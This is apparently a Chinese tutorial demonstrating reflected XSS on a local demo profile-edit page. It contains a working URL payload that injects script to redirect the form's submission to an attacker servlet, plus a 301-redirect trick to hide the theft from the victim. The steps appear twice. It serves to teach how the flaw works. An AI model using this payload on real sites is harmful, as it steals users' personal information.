假设编辑个人信息程式存在Xss漏洞
1. 界面如下:
2. 访问含有xss的脚步URl,并填完基本个人信息后,点击确认保存, 就会把用户的个人信息发送到攻击者 /Web/HackServlet 这个地址。
http://127.0.0.1:8080/web/XssServlet?name="><script>var+f=document.getElementById("login");+f.action="/web/HackServlet";+f.method="GET";</script><span+s="
3. 假设/Web/HackServlet 这个程式里面做下301重定向到编辑个人信息地址 http://127.0.0.1:8080/web/XssServlet?name=, 用户就还以为刚才填写的信息不正确,系统要求重新填写,然而攻击者已经获取到了用户的信息。
1. 界面如下:
http://127.0.0.1:8080/web/XssServlet?name=001
代码:
<h1>編輯個人信息</h1>
<form action="/web/XssServlet" method="post" name="login" id="login"><br/>
姓名:<input type="text" name="name" value="001"/><br/>
郵箱:<input type="email" name="email" value=""/><br/>
自我介紹: <textarea name="introduce" value=""></textarea><br/>
<input type="submit" value="確認保存"/>
</form>
2. 访问含有xss的脚步URl,并填完基本个人信息后,点击确认保存, 就会把用户的个人信息发送到攻击者 /Web/HackServlet 这个地址。
http://127.0.0.1:8080/web/XssServlet?name="><script>var+f=document.getElementById("login");+f.action="/web/HackServlet";+f.method="GET";</script><span+s="
代码:
<h1>編輯個人信息</h1>
<form action="/web/XssServlet" method="post" name="login" id="login"><br/>
姓名:<input type="text" name="name" value=""><script>var f=document.getElementById("login"); f.action="/web/HackServlet"; f.method="GET";</script><span s=""/><br/>
郵箱:<input type="email" name="email" value=""/><br/>
自我介紹: <textarea name="introduce" value=""></textarea><br/>
<input type="submit" value="確認保存"/>
</form>
3. 假设/Web/HackServlet 这个程式里面做下301重定向到编辑个人信息地址 http://127.0.0.1:8080/web/XssServlet?name=, 用户就还以为刚才填写的信息不正确,系统要求重新填写,然而攻击者已经获取到了用户的信息。